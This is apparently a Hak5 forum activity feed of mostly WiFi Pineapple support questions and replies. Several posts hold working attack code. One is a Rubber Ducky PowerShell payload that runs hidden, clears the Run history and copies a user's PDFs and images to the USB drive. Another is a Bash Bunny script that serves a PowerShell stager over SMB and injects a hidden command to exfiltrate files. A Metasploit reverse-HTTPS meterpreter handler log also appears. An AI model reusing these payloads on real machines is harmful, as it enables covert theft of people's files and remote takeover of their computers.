All Activity

  1. Today
  2. https://forums.hak5.org/forum/89-wifi-pineapple-nano/
  3. Hi, There is no way to import JSON results into PineAP after they have been deleted. It's a nice feature though that we'd like to implement some time.
  4. About a week ago I got my USB Rubber Ducky and I thought I would rework the USB Exfiltration payload from Hak5 episodes 2112 - 2114 to run as a .ps1 script, and I would like to share it to get some opinions on it. Here is my code:

    d.cmd:

    ```
    @echo off
    start powerShell.exe -nologo -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& '%~dpn0.ps1'"
    start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
    cscript %~d0\i.vbs %~dnp0\d.ps1
    REM @exit
    ```

    d.ps1:

    ```
    REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

    # Setup source and destination paths
    $Src = ${env:USERPROFILE}
    $sDL = (Get-Volume -FileSystemLabel _).DriveLetter #selecting the DriveLetter
    $dt1=":\slurp\${Env:ComputerName}_$((Get-Date).ToString('yyyy-MM-dd _ hh-mm-ss'))"; #Destination folder
    $Dst=$sDL+$dt1; #combining DriveLetter with Destination folder
    if (!(Test-Path $Dst)) { mkdir $Dst }

    # Wildcard for filter
    $Extension = '*40983063xch*', '*.pdf', '*.jpg'

    # Get file recursively
    Get-ChildItem -Path $Src -Filter $Extension -Recurse |
        Where-Object {!$_.PsIsContainer} |
            # For each file
            ForEach-Object {

                # If file exist in destination folder, rename it with directory tag
                if(Test-Path -Path (Join-Path -Path $Dst -ChildPath $_.Name))
                {
                    # Get full path to the file without drive letter and replace `\` with '-'
                    # [regex]::Escape is needed because -replace uses regex, so we should escape '\'
                    $NameWithDirTag = (Split-Path -Path $_.FullName -NoQualifier) -replace [regex]::Escape('\'), '-'

                    # Join new file name with destination directory
                    $NewPath = Join-Path -Path $Dst -ChildPath $NameWithDirTag
                }
                # Don't modify new file path, if file doesn't exist in target dir
                else
                {
                    $NewPath = $Dst
                }

                # Copy file
                Copy-Item -Path $_.FullName -Destination $NewPath
            }

    $wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');
    exit
    ```
  5. How can I import a previously downloaded JSON file again to the WiFi Pineapple TETRA and review?
  6. The subject says it all, please remove me from the forums. I don't see a way to delete my account information.
  7. Yesterday
  8. Hi.....

    1. On a Pi0w-P4wnP1-ALOA I run an HTTPS listener.
    2. In the Pineapple Nano Meterpreter web module I enter LHOST and LPORT of the listener.....
    3. Now I connect a 3rd device to the Nano-hosted "openWiF" and surf to the landing page in a web browser....
    4. After a few seconds, on the Pi Zero console this happens:

    ```
    =[ metasploit v5.0.29-dev ]
    + -- --=[ 1898 exploits - 1068 auxiliary - 329 post ]
    + -- --=[ 547 payloads - 44 encoders - 10 nops ]
    + -- --=[ 2 evasion ]

    [*] Processing /home/pi/.scripts/listen.rc for ERB directives.
    resource (/home/pi/.scripts/listen.rc)> use multi/handler
    resource (/home/pi/.scripts/listen.rc)> set payload windows/meterpreter/reverse_https
    payload => windows/meterpreter/reverse_https
    resource (/home/pi/.scripts/listen.rc)> set LHOST xxx.xxx.xxx.xxx
    LHOST => xxx.xxx.xxx.xxx
    resource (/home/pi/.scripts/listen.rc)> set LPORT xxxx
    LPORT => xxxx
    resource (/home/pi/.scripts/listen.rc)> set ExitOnSession true
    ExitOnSession => true
    resource (/home/pi/.scripts/listen.rc)> set AutoVerifySession false
    AutoVerifySession => false
    resource (/home/pi/.scripts/listen.rc)> set AutoSystemInfo false
    AutoSystemInfo => false
    resource (/home/pi/.scripts/listen.rc)> set AutoLoadStdapi false
    AutoLoadStdapi => false
    resource (/home/pi/.scripts/listen.rc)> exploit -j
    [*] Exploit running as background job 0.
    [*] Exploit completed, but no session was created.
    msf5 exploit(multi/handler) > [*] Started HTTPS reverse handler on https://xxx.xxx.xxx.xxx:xxxx
    ```

    And no more not less? 🤷‍♂️ My question is how to get an active meterpreter session to use stuff like "getuid" and "getsystem"!
  9. Hello, I have recently purchased my WiFi Pineapple. The first day I was able to load bulletins and follow the Hak5 setup tutorial, but now (the next day) I am unable to load bulletins, check for updates, or load modules from wifipineapple.com. Also, I am running on Windows 10 on the Acer Aspire E15. I have followed the setup tutorial and everything is configured correctly, so I don't understand.
  10. Hey guys, I just read those comments and I know they're over a year old. I'm new to this. I just purchased the WiFi Pineapple Nano Tactical. I'm trying to make sense out of what's being said, since I feel that I'm having the same issue. What I want to do is use my cell phone only, no laptop. I already have it set up and everything is working fine; however, I want to connect the USB dongle, which I believe will set wlan2, correct? And how do I access my dashboard on my Android device? I'm able to connect via Wi-Fi to the Pineapple; I type in the IP address but nothing happens, I can't connect. Any tips, anybody? So basically I want to connect my Android wirelessly to the Pineapple while it has the USB dongle, even though I know the dongle is not used for me being able to connect, cuz I believe I can connect to the Pineapple without the USB dongle. From what I understand the USB dongle is necessary for wlan2, so is there any way I can control the Pineapple through my Android phone while it still has the USB dongle connection?
  11. R03L

    USB HID

    You could technically use this for data recovery, right? Or after a new installation use it as a clean and neat backup solution. Such a HID (human interface device) could be used to input standard tasks somebody does with their computer when specific needs apply, I guess?
  12. Oh wow, for a year now we've used the term clickbait, but could we make use of chosen keymaps using, for instance, dipswitches? Maybe in the alternative form as in the original Ducky. Excuse me, it's mind-blowing. I love your shows, very entertaining, good job.
  13. I tried using its gateway address .1 but it still doesn't work. According to the Hak5 YouTube setup video I am to use .42 for its IP and log in using the .1 address.
  14. Hello everybody I'm new to this but I'm pretty familiar with how to have it up and running on Android. I recently bought a WiFi pineapple nano tactical kit I upgraded the firmware and did the setup via Android. I got the internet connection going pretty much everything is looking good however I'm having trouble understanding the wifi dongle that the tactical kit came with. I do know that you need it to set wlan2 how can I manage to do that on Android? If I connect the dongle to the nano how do I log in using my phone without going into the pineapple app that requires USB tether? Do I have to use another device rather than using the Android? Any tips would be greatly appreciated thank you in advance.
  15. Hello everybody I'm new to this but I'm pretty familiar with how to have it up and running on Android. Mike recently bought a WiFi pineapple nano tactical kit I upgraded the firmware and did the setup via Android. I got the internet connection going pretty much everything is looking good however I'm having trouble understanding the wifi dongle that the tactical kit came with. I do know that you need it to set wlan2 how can I manage to do that on Android? If I connect the dongle to the nano how do I log in using my phone without going into the pineapple app that requires USB tether? What do I have to use another device rather than using the Android? Any tips would be greatly appreciated thank you in advance.
  16. You can just call ATTACKMODE again with different parameters to achieve what you want. In your case you'd start with ATTACKMODE HID STORAGE, then do whatever you need to do, and then call ATTACKMODE HID to remove the storage aspect. Hope that helps.
  17. I experience the exact same issue. I bought the Nano 6 months ago but failed to get the internet-sharing bit up and running. Very frustrated, I disregarded the whole (for me not working) WiFi Pineapple Nano. Recently I found the Nano again, and thought I'd give it a new try. Unfortunately, same outcome. This just does not work!! Upgraded firmware/factory reset/followed all information on this forum and the rest of the internet. It-does-Not-work. Sorry for my frustration, maybe somebody can give me any support please?
  18. CNC machine tools are very important in industries, but because they are black pots and seldom studied, they do have many problems and vulns. For example, FANUC series CNC machine tools have many DoS vulns that cannot be found on CVE. Let's talk about this issue and how to defend against attacks like this.
  19. Spectre32787 - You need to use 176.16.42.1 which is the WiFi Pineapple's address.
  20. I have the very same problem here. It appears to have occurred after going from the Ralink WiFi adapter back to USB Ethernet. I can connect to the management portal but cannot connect to wifipineapple.com, which is obviously up. However, mine does not have a second IP address under the advanced tab. I have tried disabling and enabling the adapter, unplugging and plugging it back in, and redoing the ICS several times to no avail. Do I need to do a factory reset just to get it to work again?
  21. Last week
  22. Are you using a VM, live or local install of Kali? "How" the two work together with each instance is a little different. I hope these help. https://docs.hak5.org/hc/en-us/articles/360010555313-Setup-Basics https://docs.hak5.org/hc/en-us/articles/360010555373-WiFi-Pineapple-TETRA-Linux-Setup Sometimes there can be issues regarding the wifi sharing between the two. Be sure to configure everything properly. Regards, Mr. C.
  23. Hi, I really want to apologise for my delay in responding to the thread, we've been very busy working behind the scenes on upcoming stuff that we're excited to announce shortly. I've reviewed the debug output (thank you!), and it seems that unfortunately you both just received bad units. If you could both send me the support ticket numbers you have to me via a PM on the forums, I will get new ones sent out to you asap. Thanks
  24. Was having the blinking blue LED issue like a few other commenters, decided to fsck around and see what's what. Fixed it and added SMBv2 support to the script, with no changes made to the PowerShell script (s.ps1). @Darren Kitchen any chance these changes can be reflected on the official Github repo?

    ```
    #!/bin/bash
    # LED STATUS
    # ==========
    # FAIL........Failed to find dependencies
    # STAGE2......Ethernet Stage
    # SETUP.......HID Stage
    # SPECIAL.....Receiving Files
    # CLEANUP.....Moving Liberated Files
    # FINISH......Finished
    #
    # OPTIONS
    # =======
    # Exfiltration options configured from included s.ps1 script

    ######## INITIALIZATION ########
    REQUIRETOOL impacket
    GET SWITCH_POSITION
    # Make temporary loot directory
    mkdir -p /loot/smb/
    # Delete any old exfiltration data
    rm -rf /loot/smb/*
    # Copy new powershell payload to smb share
    cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/
    # Make loot directory on USB Disk
    mkdir -p /root/udisk/loot/smb_exfiltrator

    ######## ETHERNET STAGE ########
    LED STAGE2
    ATTACKMODE RNDIS_ETHERNET
    # Start the SMB Server
    python /tools/impacket/examples/smbserver.py -smb2support -comment '1337' s /loot/smb >> /loot/smbserver.log &
    # Re-enable ICMP/echo replies to trip the powershell stager
    echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all

    ######## HID STAGE ########
    # Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available
    GET HOST_IP
    LED SETUP
    ATTACKMODE HID RNDIS_ETHERNET
    RUN WIN "powershell -WindowStyle Hidden -Exec Bypass \"While (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { \\\\$HOST_IP\\s\\s.ps1; exit } }\""
    LED B 100
    # Wait until files are done copying.
    while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do sleep 1; done

    ######## CLEANUP ########
    LED CLEANUP
    # Delete EXFILTRATION_COMPLETE file
    rm -rf /loot/smb/EXFILTRATION_COMPLETE
    # Move files to udisk loot directory
    mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator
    # Clean up temporary loot directory
    rm -rf /loot/smb/e/*
    # Sync file system
    sync

    ######## FINISH ########
    # Trap is clean
    LED FINISH
    ```